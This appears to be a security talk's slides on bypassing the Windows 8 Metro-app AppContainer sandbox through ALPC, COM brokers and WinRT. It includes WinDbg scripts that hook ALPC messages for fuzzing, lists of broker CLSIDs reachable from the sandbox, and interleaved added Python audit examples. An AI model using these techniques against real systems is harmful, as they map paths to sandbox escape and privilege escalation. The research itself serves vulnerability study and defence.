• Doing research on advanced threats.
• Coming up with solutions to solve the problems found.
• Exploit techniques
• Malware detection
• Mobile security

• Advanced Persistent Threat
• Malicious documents
• System vulnerability and protection
• Mobile security
• Talks and speeches
  - Black Hat USA 2011
  - Hacks in Taiwan Conference 08'
  - Syscan Singapore 10'
Windows 8

Fancy UI!
Lots of security improvements!
Very secure!
Very robust!
Agenda

• The security design of Metro Style Apps
• Sandbox bypassing analysis
• Problems discovered and the attack vectors
  - ALPC / COM / WinRT / Design Logic
• Some issues and responses from MSRC
• Conclusion


New Security Features in Windows 8

• New kernel protection
• IE 10
  - EPMIE
  - HTML5 sandbox
• UEFI
• Application SmartScreen
• Exploit mitigation improvements
  - /GS, /SAFESEH, /DYNAMICBASE
  - DEP/NX, SEHOP
  - ASLR
• ...


WINDOWS 8 AND METRO STYLE APP 










Capability Setting

The properties of the deployment package for your app are contained in the app manifest file. You can use the Manifest Designer to set or modify one or more of the properties.

[Screenshot: Manifest Designer, Capabilities tab (tabs: Application UI, Capabilities, Declarations, Content URIs, Packaging). Capabilities listed: Documents Library Access (checked), Enterprise Authentication, Home or Work Networking, Internet (Client & Server), Internet (Client), Location, Microphone, Music Library, Pictures Library Access, Proximity, Removable Storage, Shared User Certificates, Text Messaging, Videos Library Access, Webcam. Description shown for Documents Library Access, cut off at the right edge of the screenshot: "Enables adding, changing, or deleting files in the documents libi… types that are defined by the file type association handler declar… cannot access document libraries on HomeGroup computers." More information]
Capabilities

• Network
  - Enterprise authentication, Internet (client), Internet (client & server), Intranet, text messaging, etc.
• File system
  - Documents, Pictures, Music, Videos, etc.
• Devices
  - Location (e.g. GPS), microphone, proximity (e.g. NFC), removable storage, etc.
• Things that are specific to an application (local storage, settings, etc.) do not require capabilities.
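The capability list above is what a reviewer sees in the manifest, so the natural check is to read the manifest and group and flag what it asks for. The following is an added example, not code from the talk: it parses a Windows 8 AppxManifest.xml (namespace http://schemas.microsoft.com/appx/2010/manifest, with `Capability` and `DeviceCapability` elements), groups the names the way the slide does, and flags the grants a reviewer should question, including the Documents Library rule the screenshot above states (access covers only file types declared through a file type association). The sample manifest and the review heuristics are constructed for this example.

```python
"""Review the capabilities an Appx manifest declares (added example, not from the talk)."""
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.microsoft.com/appx/2010/manifest"}

# Capability names from the Windows 8 app manifest schema, grouped the way the slide groups them.
NETWORK = {"internetClient", "internetClientServer", "privateNetworkClientServer",
           "enterpriseAuthentication", "sharedUserCertificates"}
FILESYSTEM = {"documentsLibrary", "picturesLibrary", "musicLibrary",
              "videosLibrary", "removableStorage"}
DEVICE = {"location", "microphone", "webcam", "proximity"}


def build_manifest(capabilities, device_capabilities=(), file_type=None):
    """Construct a minimal AppxManifest.xml (constructed sample for this example, not a real app)."""
    caps = "".join('<Capability Name="%s" />' % c for c in capabilities)
    caps += "".join('<DeviceCapability Name="%s" />' % c for c in device_capabilities)
    fta = ""
    if file_type:
        fta = ('<Extensions><Extension Category="windows.fileTypeAssociation">'
               '<FileTypeAssociation Name="%s"><SupportedFileTypes><FileType>.%s</FileType>'
               '</SupportedFileTypes></FileTypeAssociation></Extension></Extensions>'
               % (file_type, file_type))
    return ('<Package xmlns="http://schemas.microsoft.com/appx/2010/manifest">'
            '<Identity Name="Example.App" Publisher="CN=Example" Version="1.0.0.0" />'
            '<Applications><Application Id="App" StartPage="default.html">%s</Application>'
            '</Applications><Capabilities>%s</Capabilities></Package>' % (fta, caps))


def declared_capabilities(manifest_xml):
    """Return every capability name the manifest asks for, Capability and DeviceCapability alike."""
    root = ET.fromstring(manifest_xml)
    names = [c.get("Name") for c in root.findall("m:Capabilities/m:Capability", NS)]
    names += [c.get("Name") for c in root.findall("m:Capabilities/m:DeviceCapability", NS)]
    return names


def has_file_type_association(manifest_xml):
    root = ET.fromstring(manifest_xml)
    return root.find(".//m:Extension[@Category='windows.fileTypeAssociation']", NS) is not None


def review(manifest_xml):
    """Group the declared capabilities and flag the ones a reviewer should question."""
    caps = set(declared_capabilities(manifest_xml))
    findings = []
    if "internetClientServer" in caps:
        findings.append("internetClientServer: app accepts inbound connections; "
                        "internetClient is enough for an app that only fetches content")
    if "documentsLibrary" in caps and not has_file_type_association(manifest_xml):
        findings.append("documentsLibrary: access covers only file types the app declares "
                        "through a file type association, and none is declared")
    for name in sorted(caps & (DEVICE | {"enterpriseAuthentication", "sharedUserCertificates"})):
        findings.append("%s: grants access to user data or credentials; "
                        "confirm the feature needs it" % name)
    return {
        "network": sorted(caps & NETWORK),
        "filesystem": sorted(caps & FILESYSTEM),
        "device": sorted(caps & DEVICE),
        "unknown": sorted(caps - NETWORK - FILESYSTEM - DEVICE),
        "findings": findings,
    }


if __name__ == "__main__":
    sample = build_manifest(["internetClientServer", "documentsLibrary", "enterpriseAuthentication"],
                            device_capabilities=["webcam"], file_type="txt")
    for key, value in review(sample).items():
        print(key, value)
```

Names that fall into `unknown` are either typos or capabilities added after the Windows 8 schema this example encodes, so they deserve a look rather than silent acceptance.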


USA TODAY was installed

[Screenshot: Windows Store listing for the USA TODAY app (Home > News & weather > News; Overview, Details, Reviews; Write a review). Description: "The latest news stories, photos, videos, and weather you've come to expect from USA TODAY are now available in a beautiful way on Windows 8. Staying informed has never been this quick, easy, or enjoyable." Features: "Read stories from USA TODAY'S News, Money, Sports, Life, Tech and Travel sections. View large article…" (remainder cut off)]
[Figure: Windows 8 layered architecture; labels still legible include "Graphics & …", "… Printing", "Application Model" and "Windows Core OS Services".
Source: http://blogs.msdn.com/b/b8/archive/2012/02/09/building-windows-for-the-arm-processor-architecture.aspx]
WinRT APIs

• Windows Runtime (WinRT API) is the backbone of the new Metro-style apps (also known as Immersive apps) in the Windows 8 operating system.
• It provides a set of APIs that can be called from .NET languages (C#, VB.NET, F#), C++, and HTML/JavaScript.
• Apps created for WinRT are
  - Safe
  - Secure
  - Sandboxed

[Figure: Metro style app stack; labels: Core System Services, Controller, View; WinRT API; App Container.]
• What is an application sandbox?
  - A sandbox is a mechanism to isolate untrusted processes.
  - It protects the system from exploitation.
  - All Metro style apps run in an AppContainer.
• What does a sandbox consist of?
  - An isolated process which runs with very limited rights
  - A broker, a process which can execute specific actions on behalf of an isolated process
  - An IPC mechanism that allows isolated processes to communicate with the broker



AppContainer

[Figure: a Metro application inside the App Container reaches the OS core only through WinRT APIs, with its capabilities supplied by the Appx manifest; a second panel contrasts this with direct API calls into the OS core.]

AppContainer SIDs shown on the slide:
S-1-15-2-4238777794-2574622755-3451309604-3242812027-3424635963-2206017950-816935883
S-1-15-2-550462423-1739240917-3080957089-132361967-1042326411-2246802949-1096419336

Storage: per-package keys under
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContai… (key name cut off in the screenshot)

Picture source: http://ameblo.jp/naoshill28/entry-11049964906.html































































[Figure: the Windows Store trust pipeline; elements shown: Telemetry, Feedback, Windows 8 SDK for Metro style apps, Windows App Certification Kit, App Signatures, Frictionless Install, Store Onboarding, App Confidence, App Container, Ratings & Reviews.]

We agree all of these designs really provide a secure execution environment for Metro style apps.

Source: http://blogs.msdn.com/b/b8/archive/2012/05/17/delivering-reliable-and-trustworthy-metro-style-apps.aspx


Security design of Metro Style App

• Executed in an "App Container"
  - Secured through a sandbox
  - Severely limited access to resources
  - Resource access needs explicit permissions (capabilities)
  - Use a restricted subset of .NET and Win32 APIs
• Distributed only through the Windows Store


Previous Works on Sandbox Bypassing

• Exploit kernel or privilege escalation vulnerabilities to escape the sandbox.
• File system: look for accessible folders, files and registry keys, especially writable locations on disk, and see what can be done with or obtained from those places.
• Send window messages or keyboard events to targets outside the sandbox; they might trigger privileged actions.
• Leverage special handles: some available handles might be usable to communicate with other processes or resources.


ATTACK VECTORS

AppContainer Sandbox Attack Vectors

• ALPC
• COM
• WinRT
• Design Logic


ATTACK ALPC

DEBUG OF ALPC COMMUNICATION

[Figure 3-27, "Use of ALPC ports": client address space, kernel address space holding the connection port, and server address space. Source: http://mba.shengwushibie.com/itbook/BookChapter.aspPich28217]

[Figure: request path from a Metro app to RuntimeBroker. The app marshals the request through COM; RuntimeBroker receives it, unmarshals it, checks the capability and opens the file; the result is marshalled back over COM. Ref: http://www.quarkslab.com/dl/2012-HITB-WinRT.pdf]
0: kd> !alpc /lpp 85c44400

Ports created by the process 85c44400:

Port 856b11b0 is not a connection port.

Ports the process 85c44400 is connected to:

8491b038 0 -> 83ae22e0('ApiPort') 0 852bf6c0('csrss.exe')
83ad9660 0 -> 83ac4540('lsapolicylookup') 0 83aa0300('lsass.exe')
8495b458 0 -> 8571fd98('epmapper') 0 85720c00('svchost.exe')
86058408 0 -> 85722270('actkernel') 0 8570ea00('svchost.exe')
83fc1038 0 -> 857da150('ThemeApiPort') 0 857c0a80('svchost.exe')
8492ee40 0 -> 85ed35b0('OLECE394EC247374B3DB80DFB0D7935') 0 85e4bcc0('explorer.exe')
85f9f2a8 0 -> 83ac43f0('lsasspirpc') 0 83aa0300('lsass.exe')
8513e8f8 0 -> 857bdef8('FontCachePort') 0 857b4c00('svchost.exe')
86000618 0 -> 85d67188('msctf.serverDefault1') 0 85d66700('taskhost.exe')
83abd6f0 0 -> 84967c28('OLE94FA4C860892A252B3E8A6020AC3') 1 84b0f380('RuntimeBroker.')
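The `!alpc /lpp` listing above is the inventory of a sandboxed process's trust boundary: every server port it is connected to is a place where a broker or system service accepts its messages. The following is an added example, not code from the talk: it parses that listing into records, re-joining entries that WinDbg wrapped across two lines (as one entry does on the slide), groups the reachable port names by server image, and picks out the OLE-named ports, which are COM's own ALPC endpoints and therefore the ones carrying the broker calls the talk goes on to examine. The sample input is the slide's listing re-typed with its OCR errors corrected; the two numeric columns between the handles are matched but not interpreted.

```python
"""Parse the `!alpc /lpp` listing of a process's ALPC connections (added example, not from the talk)."""
import re
from collections import defaultdict, namedtuple

AlpcConnection = namedtuple("AlpcConnection",
                            "client_port server_port port_name server_process server_image")

# One connection per entry: <client port> <n> -> <server port>('<port name>') <n> <process>('<image>')
ENTRY_RE = re.compile(
    r"^([0-9a-f]+)\s+\d+\s+->\s+([0-9a-f]+)\('([^']*)'\)\s+\d+\s+([0-9a-f]+)\('([^']*)'\)$")
START_RE = re.compile(r"^[0-9a-f]+\s+\d+\s+->")

# Sample input: the listing from the slide, re-typed, with one entry wrapped across two lines
# exactly as it appears there.
SAMPLE = """\
0: kd> !alpc /lpp 85c44400
Ports created by the process 85c44400:
Port 856b11b0 is not a connection port.
Ports the process 85c44400 is connected to:
8491b038 0 -> 83ae22e0('ApiPort') 0 852bf6c0('csrss.exe')
83ad9660 0 -> 83ac4540('lsapolicylookup') 0 83aa0300('lsass.exe')
8495b458 0 -> 8571fd98('epmapper') 0 85720c00('svchost.exe')
86058408 0 -> 85722270('actkernel') 0 8570ea00('svchost.exe')
83fc1038 0 -> 857da150('ThemeApiPort') 0 857c0a80('svchost.exe')
8492ee40 0 -> 85ed35b0('OLECE394EC247374B3DB80DFB0D7935') 0
85e4bcc0('explorer.exe')
85f9f2a8 0 -> 83ac43f0('lsasspirpc') 0 83aa0300('lsass.exe')
8513e8f8 0 -> 857bdef8('FontCachePort') 0 857b4c00('svchost.exe')
86000618 0 -> 85d67188('msctf.serverDefault1') 0 85d66700('taskhost.exe')
83abd6f0 0 -> 84967c28('OLE94FA4C860892A252B3E8A6020AC3') 1 84b0f380('RuntimeBroker.')
"""


def parse_alpc_connections(text):
    """Return the connections listed after 'is connected to:', re-joining entries that wrapped."""
    entries, in_list = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Ports the process") and line.endswith("connected to:"):
            in_list = True
            continue
        if not in_list:
            continue
        if START_RE.match(line):
            entries.append(line)
        elif entries and not ENTRY_RE.match(entries[-1]):
            entries[-1] += " " + line          # continuation of a wrapped entry
    conns = []
    for entry in entries:
        m = ENTRY_RE.match(entry)
        if m:
            conns.append(AlpcConnection(*m.groups()))
    return conns


def ports_by_server(conns):
    """Map each server image to the sorted port names the sandboxed process can reach in it."""
    by_server = defaultdict(set)
    for c in conns:
        by_server[c.server_image].add(c.port_name)
    return {image: sorted(names) for image, names in by_server.items()}


def com_endpoints(conns):
    """COM names its ALPC endpoints 'OLE' followed by hex; these carry the broker calls."""
    return [c for c in conns if c.port_name.startswith("OLE")]


if __name__ == "__main__":
    conns = parse_alpc_connections(SAMPLE)
    for image, names in sorted(ports_by_server(conns).items()):
        print("%-16s %s" % (image, ", ".join(names)))
    print("COM endpoints:", [c.server_image for c in com_endpoints(conns)])
```

Run against a listing taken from an app process, the grouped output is a quick way to see which brokers a given package can actually talk to, and the OLE entries tell you which of them are reached through COM rather than through a dedicated port.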




ALPC syscalls

82027f18 823ee774 nt!NtAlpcSetInformation
82027f1c 8247ba70 nt!NtAlpcSendWaitReceivePort
82027f20 824904ce nt!NtAlpcRevokeSecurityContext
82027f24 8248a704 nt!NtAlpcQueryInformationMessage
82027f28 823fdd80 nt!NtAlpcQueryInformation
82027f2c 82408280 nt!NtAlpcOpenSenderThread
82027f30 823fdfdc nt!NtAlpcOpenSenderProcess
82027f34 824916d0 nt!NtAlpcImpersonateClientOfPort
82027f38 824b2f06 nt!NtAlpcDisconnectPort
82027f3c 82490b26 nt!NtAlpcDeleteSecurityContext
82027f40 824cdcd4 nt!NtAlpcDeleteSectionView
82027f44 824dc258 nt!NtAlpcDeleteResourceReserve
82027f48 824cd3e8 nt!NtAlpcDeletePortSection
82027f4c 82490034 nt!NtAlpcCreateSecurityContext
82027f50 824cd72a nt!NtAlpcCreateSectionView
82027f54 824dc024 nt!NtAlpcCreateResourceReserve
82027f58 824ccf96 nt!NtAlpcCreatePortSection
82027f5c 824defc4 nt!NtAlpcCreatePort
82027f60 824e9ae4 nt!NtAlpcConnectPort
82027f64 824e9aa0 nt!NtAlpcConnectPortEx
82027f68 8247bca0 nt!NtAlpcCancelMessage
82027f6c 824f78de nt!NtAlpcAcceptConnectPort

Highlighted:

82027f1c 8247ba70 nt!NtAlpcSendWaitReceivePort
82027f5c 824defc4 nt!NtAlpcCreatePort
82027f60 824e9ae4 nt!NtAlpcConnectPort
82027f6c 824f78de nt!NtAlpcAcceptConnectPort



ALPC Communication

Conditional breakpoint on ntdll!NtAlpcSendWaitReceivePort that dumps every message sent or received by the process whose PID is held in @$t10 (0xe4c here); sent messages are dumped at the call, received messages at the return address:

bp ntdll!NtAlpcSendWaitReceivePort ".catch{r @$t10 = 0xe4c;.if(@$teb != 0){.if(poi(@$teb+20) = @$t10){!handle poi(esp+0x4);.process; .printf \"PID:%x PortHandle:%x Flags:%x SendMessage:%x SendMessageAttributes:%x ReceiveMessage:%x BufferLength:%x ReceiveMessageAttributes:%x Timeout:%x\r\n\",poi(@$teb+20),poi(esp+0x4),poi(esp+0x8),poi(esp+0xc),poi(esp+0x10),poi(esp+0x14),poi(esp+0x18),poi(esp+0x1c),poi(esp+0x20);.if(poi(esp+0xc)!=0){.printf \"send:\";dt _PORT_MESSAGE poi(esp+0xc);db poi(esp+0xc) L (poi(poi(esp+0xc))&0xffff)+0x18;gc;};.if(poi(esp+0x14)!=0){r @$t0 = poi(esp+0x14);.printf \"recv:\";bp poi(esp) \".process;.if(poi(@$teb+20) = @$t10){r @$t1 = (poi(@$t0)&0xffff)+0x18;dt _PORT_MESSAGE @$t0;!alpc /lpp;!alpc /m poi(@$t0+0x10);db @$t0 L @$t1;bc 2;gc;}.else{gc;}\";gc;}}.else {gc;}}.else {gc;}}"



HOOK ALPC communication (1)

bp nt!NtAlpcCreatePort ".process; .printf \"PID:%x PortHandle:%x ObjectAttributes:%x MaxConnectionInfoLength:%x MaxMessageLength:%x MaxPoolUsage:%x\r\n\",poi(@$teb+20),poi(esp+0x4),poi(esp+0x8),poi(esp+0xc),poi(esp+0x10),poi(esp+0x14);"

bp nt!NtAlpcConnectPort ".process; .printf \"PortHandle:%x PortName:%msu ObjectAttributes:%x PortAttributes:%x Flags:%x RequiredServerSid:%x ConnectionMessage:%x BufferLength:%x OutMessageAttributes:%x InMessageAttributes:%x Timeout:%x\r\n\",poi(esp+0x4),poi(esp+0x8),poi(esp+0xc),poi(esp+0x10),poi(esp+0x14),poi(esp+0x18),poi(esp+0x1c),poi(esp+0x20),poi(esp+0x24),poi(esp+0x28),poi(esp+0x2c)"

bp nt!NtAlpcAcceptConnectPort ".process; .printf \"PortHandle:%x ConnectionPortHandle:%x Flags:%x ObjectAttributes:%x PortAttributes:%x PortContext:%x ConnectionRequest:%x ConnectionMessageAttributes:%x AcceptConnection:%x\r\n\",poi(esp+0x4),poi(esp+0x8),poi(esp+0xc),poi(esp+0x10),poi(esp+0x14),poi(esp+0x18),poi(esp+0x1c),poi(esp+0x20),poi(esp+0x24);"



HOOK ALPC communication (2)

.logopen "metroapp.txt"
  ↓
Hook nt!NtAlpcCreatePort
  ↓
Open Metro App
  ↓
Hook ntdll!NtAlpcSendWaitReceivePort
Sample log output:

ncalrpc:[\\Sessions\\1\\AppContainerNamedObjects\\S-1-15-2-1115239912-5888679-3094415206-3103815194-10819155-2778485781-2267460753\\RPC Control\\OLE9517A3676FBEC77BBFB0BB30B841]

• {BE0DA0AD-C47E-56DA-BF00-F4344E2FCE93} App.wwa

Implicit process is now 85208a00
PID:7ec PortHandle:168 Flags:20000 SendMessage:bfb688 SendMessageAttributes:c0a5cc ReceiveMessage: (rest of the line cut off)
Fuzzing ALPC communication

• Inline ASM
• Hook ntdll!NtAlpcSendWaitReceivePort
• Modify the send buffer with fuzzing data































ATTACK COM SERVER

Windows 8 COM

• InInitOrder.Blink → kernelbase.dll (instead of kernel32.dll)
• OLE32.dll (Windows 2000 → Windows 7)
• ComBase.dll (Windows 8)


[Screenshot: export table of combase.dll; entries visible include RoOriginateError, RoReportCapabilityCheckFailure, RoResolveRestrictedErrorInfoReference, RoRevokeActivationFactories, RoSetErrorReportingFlags, RoTransformError, RoTransformErrorW, RoUninitialize, RoUnregisterForApartmen… Alongside it, an OllyDbg view of the test program con_test calling combase!CoCreateInstance:]

0040102D  8D45 FC        LEA EAX,DWORD PTR SS:[EBP-4]          ; &ppv
00401030  50             PUSH EAX                              ; ppv
00401031  68 F0604000    PUSH con_test.004060F0                ; riid
00401036  6A 04          PUSH 4                                ; dwClsContext = CLSCTX_LOCAL_SERVER
00401038  6A 00          PUSH 0                                ; pUnkOuter = NULL
0040103A  68 C0604000    PUSH con_test.004060C0                ; rclsid
0040103F  FF15 B4604000  CALL DWORD PTR DS:[<&combase.CoCreateInstance>]
















Purpose of COM Testing

• Test the stability of the COM server
  - Looking for memory problems
• Test the functionality of the COM server
  - There might be some useful functions that can help us do privileged operations.


The Target - RuntimeBroker

[Figure: Metro style apps inside the AppContainer call WinRT, which goes over COM to RuntimeBroker outside the container.]

The Target - Other Possibility

[Figure: the AppContainer talking over COM to other broker processes besides RuntimeBroker.]

The Target - Privilege

[Screenshot: Process Explorer with the Integrity column: svchost.exe "Host Process for Windows S…" (System), dasHost.exe "Device Association Framewo…" (System), WUDFHost.exe "Windows Driver Foundation …" (System), TabTip.exe "Touch Keyboard and Handw…" (High).]

Examples:

Metro app COM interface → broker process
  RuntimeBroker.exe → Medium
  ImeBroker.exe → Medium
  Wkspbroker.exe → Medium
  TabTip.exe → High
The Target - Available COM

[Screenshot: COMView listing CLSIDs registered as LocalServer32, with their server paths and ProgIDs. Classes visible include RemoteAssistance Class (RAServer.exe), RuntimeBroker (RuntimeBroker.exe), SDChangeObj Class (sdchange.exe), Setting Sync Task, Settings Search, ShapeCollector Class, ShareFlow, Shell AutoPlay Direct, Shell Execute Hardware Event Handler, Shell Hardware Mixed Content Handler, Shell Hardware Mixed Content Handler Cancelled, ShellBrowserWindow, ShellWindows, Windows Media Player Rich Preview Handler, Windows Media Player Device Autoplay, Spell Checking Host Class, SPPUIObjectInteractive Class, StiEventHandler Class, Sync Center (Private), Sync Center Client, Sync Center Control, Sync Center Isolation Collection (Private), Sync Center Schedule Wizard, Sync Integration Manager, SyncInfrastructure Class, TextContributor Class, Thumbnail Extraction Host Class, TPM Virtual Smart Card Manager, TSRDSettings Class, UIHost Class, UPnPContainer, UPnPContainer64, User CPL User Manager Out of Proc Helper, Windows Media Player Burn Audio CD Handler, Virtual Disk Service Loader, WIA Event Prompt Class, Windows Markup File. Server executables in the path column include SettingSyncHost.exe, rundll32.exe (shell32 and other DLLs), the Windows Media Player binaries, MsSpellCheckingHost…, slui.exe, wiaacmgr.exe, mobsync.exe, ThumbnailExtractio…, TpmVscMgrSvr.ex…, TSTheme.exe, upnpcont.exe, UserAccountBroker.exe, vdsldr.exe and PresentationHost.exe.]

Looking for Local Servers

[Screenshot: Process Explorer with the Integrity column: svchost.exe "Host Process for Windows S…" (System), dllhost.exe "COM Surrogate" (System), RuntimeBroker.exe "Runtime Broker" (Medium), CredentialUIBroker.exe "Credential Manager UI Host" (Medium), svchost.exe (System), dasHost.exe "Device Association Framewo…" (System), WUDFHost.exe "Windows Driver Foundation …" (System), TabTip.exe "Touch Keyboard and Handw…" (High).]

[Screenshot: DCOM configuration for {DE50C7BB-FAA7-4A7F-BA47-BF0EFCFE433D} (tabs: Implementation, Activation, Launch Permissions, Access Permissions), "Use these launch permissions" selected instead of the defaults; User/Group "APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES", Can Launch: Yes.]
Attack COM server in Metro App

[Figure: a Metro app (inline ASM) performing a fuzzing attack: CoCreateInstance → IID / interface → vptr → VtFunc1, VtFunc2, VtFunc3 in the COM server, which runs at Medium or High integrity.]
CLSIDs of imebroker

{69B1A7D7-C09E-40E9-A1DF-688007A2D9E4} // imebroker.exe
{9A4B1918-0A2F-4422-89DD-35B3F455999C} // imebroker.exe
{A4FBCBC6-4BE5-4C3D-8AB5-8B873357A23E} // imebroker.exe
{BA6EE7D8-190D-423A-93CC-1270E6599195} // imebroker.exe
{C658E5BD-817B-41C8-8FB6-5B2B386A40EA} // imebroker.exe
{DE50C7BB-FAA7-4A7F-BA47-BF0EFCFE433D} // imebroker.exe
{DF46CD07-4F86-42F0-8FA9-35C3CE55D77B} // imebroker.exe

CLSIDs with "ALL APPLICATION PACKAGES" launch permission

{7FC12E96-4CB7-4ABD-ADAA-EF7845B10629} // CredentialUIBroker.exe
{31337EC7-5767-11CF-BEAB-00AA006C3606} // AuthHost.exe
{36BBB745-0999-4FD8-A538-4D4D84E4BD09} // CLSID_JITDebuggingHost
{228826AF-02E1-4226-A9E0-99A855E455A6} // Immersive Shell Broker (unknown)
{A47979D2-C419-11D9-A5B4-001185AD2B89} // Network List Manager (unknown)
{C4D6E899-E38A-4838-9188-0B98EE3175E6} // ProgrammabilityManager Class (unknown)
{D63B10C5-BB46-4990-A94F-E40B9D520160} // RuntimeBroker.exe
{549E57E9-B362-49D1-B679-B64D510EFE4B} // ShareFlow
{7B6EA1D5-03C2-4AE4-B21C-8D0515CC91B7} // Shell Create Object Task Server (unknown)
{F1425A67-1545-44A2-AB59-8DF1020452D9} // Spell Checking Host Class
{D6E88812-F325-4DC1-BBC7-23076618E58D} // TsfManager Class (unknown) TabTip.exe
{6B19643A-0CD7-4563-B710-BDC191FCAD3B} // TSFstateManager Class (unknown) TabTip.exe
{054AAE20-4BEA-4347-8A35-64A533254A9D} // UIHost Class (High) TabTip.exe
{4CE576FA-83DC-4F88-951C-9D0782B4E376} // UIHostNoLaunch Class (unknown) TabTip.exe
{2F93C02D-77F9-46B4-95FB-8CBB81EEB62C} // DevicesFlow
{19C65143-6230-42FA-A58E-7D9FA9BE2EB5} // WorkspaceBroker Class wkspbroker.exe
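The list above was built by reading each server's DCOM launch permission and looking for a grant to ALL APPLICATION PACKAGES (S-1-15-2-1), the SID the DCOMCNFG screenshot shows. The following is an added example, not code from the talk, showing the check itself on the raw data: the `LaunchPermission` value DCOM stores is a self-relative security descriptor, so the code decodes its DACL (standard ACE layout, which is what launch permissions use), reads each ACE's SID and access mask, and reports whether S-1-15-2-1 is allowed `COM_RIGHTS_EXECUTE`. A small builder constructs sample descriptors so the block runs offline. Two caveats the reader should carry over to a real audit: the check only looks at the group SID, not at a per-package SID (S-1-15-2-<long>) that could be granted instead, and a grant to ALL APPLICATION PACKAGES is necessary but not sufficient for an AppContainer caller, because the token's ordinary user and group SIDs must pass the same DACL as well, which this example does not model.

```python
"""Check a COM LaunchPermission security descriptor for the ALL APPLICATION PACKAGES grant
(added example, not from the talk)."""
import struct

ALL_APPLICATION_PACKAGES = "S-1-15-2-1"   # SID shown in the DCOMCNFG screenshot
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_DENIED_ACE_TYPE = 0x01
COM_RIGHTS_EXECUTE = 0x1                  # the bit DCOM checks for launch / access
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def build_sid(sid_text):
    """Encode 'S-R-A-s1-s2-...' as a binary SID (revision, count, 48-bit big-endian authority, subs)."""
    parts = sid_text.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def parse_sid(buf, off):
    """Decode a binary SID at buf[off]; return (text, encoded length)."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_launch_permission(entries):
    """Construct a self-relative security descriptor holding only a DACL (sample data for this
    example). entries: list of (ace_type, access_mask, sid_text) in DACL order."""
    aces = b""
    for ace_type, mask, sid_text in entries:
        sid = build_sid(sid_text)
        aces += struct.pack("<BBHI", ace_type, 0, 8 + len(sid), mask) + sid
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(entries), 0) + aces
    # SECURITY_DESCRIPTOR_RELATIVE: Revision, Sbz1, Control, Owner, Group, Sacl, Dacl offsets
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + acl


def dacl_aces(sd):
    """Return [(ace_type, mask, sid_text)] from the DACL, or None when no DACL is present
    (a NULL DACL grants everyone everything). Only the standard ACE layout is handled."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return None
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off, aces = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        sid_text, _ = parse_sid(sd, off + 8)
        aces.append((ace_type, mask, sid_text))
        off += ace_size
    return aces


def app_container_can_launch(sd):
    """True when the DACL lets ALL APPLICATION PACKAGES launch the server (the first matching
    ACE decides, as denies precede allows in a canonical DACL)."""
    aces = dacl_aces(sd)
    if aces is None:
        return True
    for ace_type, mask, sid_text in aces:
        if sid_text != ALL_APPLICATION_PACKAGES or not mask & COM_RIGHTS_EXECUTE:
            continue
        if ace_type == ACCESS_DENIED_ACE_TYPE:
            return False
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            return True
    return False


if __name__ == "__main__":
    # Constructed sample: Administrators plus ALL APPLICATION PACKAGES may launch.
    sd = build_launch_permission([(ACCESS_ALLOWED_ACE_TYPE, 0x1f, "S-1-5-32-544"),
                                  (ACCESS_ALLOWED_ACE_TYPE, COM_RIGHTS_EXECUTE,
                                   ALL_APPLICATION_PACKAGES)])
    print("launchable from AppContainer:", app_container_can_launch(sd))
```

On a real system the bytes would come from `HKEY_CLASSES_ROOT\AppID\{appid}\LaunchPermission`; the CLSIDs listed above are the ones for which this check came back positive.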



Looking for Interfaces of Local Server

[Screenshot: interface viewer for object "UIHost Class", listing IID, name, interface address and vtable address for IUnknown, IMultiQI, IClientSecurity, IDispatch, IHostWindow2, ITipInvocation, ITipProperties, ITextCorrectionSite and ITipWindow.]













Looking for functions of Local Server

[Screenshot: interface viewer for object CLSID_JITDebuggingHost: IUnknown, IMultiQI, IClientSecurity, IJITDebuggingHost2, IJITDebuggingHost1 (outgoing interfaces); the vtable of IJITDebuggingHost2 has four slots at offsets 0, 4, 8 and 12.]

IDA view of the same vtable:

.text:00404958 ; const JITDebuggingHost::CHost::`vftable'{for `IJITDebuggingHost2'}
.text:00404958 ??_7CHost@JITDebuggingHost@@6BIJITDebuggingHost2@@@ dd offset ?QueryInterface@CHost@JITDebuggingHost@@UAGJABU_GUID@@PAPAX@Z
.text:00404958 ; DATA XREF: .data:JITDebuggingHost::CHost::s_Instance↑o
.text:00404958 ; JITDebuggingHost::CHost::QueryInterface(_GUID const &,void * *)
.text:0040495C dd offset ?AddRef@CHost@JITDebuggingHost@@UAGKXZ ; JITDebuggingHost::CHost::AddRef(void)
.text:00404960 dd offset ?Release@CHost@JITDebuggingHost@@UAGKXZ ; JITDebuggingHost::CHost::Release(void)
.text:00404964 dd offset ?JITAsLoggedInUser@CHost@JITDebuggingHost@@UAGJUtagCRASHING_PROGRAM_INFO@@@Z ; JITDebuggingHost::CHost



















COM Interface Method Fuzzing 

































ATTACK WINRT API

[Figure: WinRT APIs grouped into Communication & Data, Graphics & Media, Devices & Printing and Application Model.]

Metro style application APIs

[Figure: API map. User Interface: HTML5/CSS, XAML, DirectX, Controls, Data Binding, SVG, Tiles, Input, Accessibility, Printing. Devices: Portable, Sensors, NFC. Communications & Data: Contracts, Local & Cloud Storage, Web, Notifications, Streams, Background Transfer, XML, Networking, SMS. Media: Playback, Capture, PlayTo, Visual Effects. Fundamentals: Application Services, Threading/Timers, Memory Management, Authentication, Cryptography, Globalization.]

